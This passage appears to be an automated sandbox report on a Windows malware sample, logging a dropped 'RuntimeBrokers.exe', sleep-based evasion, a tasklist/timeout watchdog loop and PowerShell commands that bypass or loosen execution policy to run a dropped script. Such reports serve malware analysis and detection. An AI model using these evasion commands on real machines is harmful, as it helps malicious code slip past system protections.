Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeWindow / User API: threadDelayed 8057Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9792Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9784Jump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeDropped PE file which has not been started: C:\Users\Public\Bilite\flashcenter_pp_ax_install_cn.exeJump to dropped file
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\backup.dllJump to dropped file
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe TID: 5624Thread sleep time: -73000s >= -30000sJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe TID: 1140Thread sleep count: 102 > 30Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe TID: 1140Thread sleep time: -306000s >= -30000sJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe TID: 1140Thread sleep count: 8057 > 30Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe TID: 1140Thread sleep time: -24171000s >= -30000sJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe TID: 7284Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe TID: 2324Thread sleep count: 38 > 30Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 5348Thread sleep count: 273 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3468Thread sleep count: 9792 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7364Thread sleep count: 9784 > 30Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 620Thread sleep count: 268 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8172Thread sleep count: 274 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 2964Thread sleep count: 269 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 2772Thread sleep count: 270 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 3608Thread sleep count: 269 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 7104Thread sleep count: 270 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 1596Thread sleep count: 270 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 4428Thread sleep count: 268 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 3204Thread sleep count: 270 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8020Thread sleep count: 268 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 2448Thread sleep count: 269 > 30
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeCode function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_0040301A
Source: C:\Users\user\Desktop\CnjMEmbChO.exeCode function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402B79
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeThread delayed: delay time: 73000Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeThread delayed: delay time: 30000Jump to behavior
Source: powershell.exe, 0000000F.00000002.85558022564.00000000047E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 0000000F.00000002.85572145117.00000000070CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FMSFT_NetEventVmNetworkAdatper.cdxml
Source: powershell.exe, 0000000F.00000002.85558022564.00000000047E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
Source: yxhxvpke.png.0.drBinary or memory string: %hgFs[n
Source: powershell.exe, 0000000F.00000002.85572145117.00000000070CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMSFT_NetEventVmNetworkAdatper.format.ps1xml
Source: powershell.exe, 0000000F.00000002.85558022564.00000000047E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeCode function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,0_2_00406D5D
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Users\user\Desktop\CnjMEmbChO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeCode function: 0_2_0040D72E cpuid 0_2_0040D72E
